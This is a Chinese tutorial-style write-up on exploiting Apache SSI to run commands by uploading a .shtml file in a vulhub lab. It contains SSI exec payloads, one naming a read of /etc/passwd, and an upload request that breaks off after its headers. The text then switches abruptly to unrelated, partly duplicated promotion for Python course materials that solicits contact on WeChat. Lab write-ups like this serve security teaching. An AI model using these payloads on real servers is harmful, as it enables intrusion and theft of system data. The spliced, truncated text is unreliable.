当目标服务端存在不允许上传php后缀的文件时,但是同时又开启了SSI与CGI支持,攻击者就可以上传一个shtml文件,并利用 语法执行任意命令。因为 SSI 支持从 HTML 的注释行中读取命令并执行,所以当 HTML 注释行中存在恶意的代码时,就会造成远程命令执行。
例如:
<!--#echo var="cat /etc/passwd" -->
环境准备
靶机环境 139.196.87.102 (vulhub)
攻击机环境 192.168.8.131 (虚拟机 Ubuntu 20、Java1.8、Burp)
启动 Apache SSI 远程命令执行漏洞 环境
1.进入 vulhub 的 ssi-rce 路径
cd /usr/local/tools/vulhub/httpd/ssi-rce
2.编译并启动环境
docker-compose up -d
3.查看环境运行状态
docker ps | grep ssi-rce
漏洞利用
访问 8080 端口
上传一个 php 后缀文件,报错
此时,我们就可以利用 SSI 的特性,上传一个 “.shtml” 文件,内容为 <!--#exec cmd="date" -->
,此处的 “date” 可以自己任意改。
数据包内容如下
POST /upload.php HTTP/1.1
Host: 139.196.87.102:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------35865659458080190163578845461
Content-Length: 258
一、Python所有方向的学习路线
Python所有方向路线就是把Python常用的技术点做整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
二、学习软件
工欲善其事必先利其器。学习Python常用的开发软件都在这里了,给大家节省了很多时间。
三、入门学习视频
我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了。
小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。
深知大多数初中级Python工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!
因此收集整理了一份《2024年Python爬虫全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频
如果你觉得这些内容对你有帮助,可以添加下面V无偿领取!(备注:python)
,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。**
由于文件比较大,这里只是将部分目录截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频
如果你觉得这些内容对你有帮助,可以添加下面V无偿领取!(备注:python)
[外链图片转存中…(img-TpfBcZFh-1711124258588)]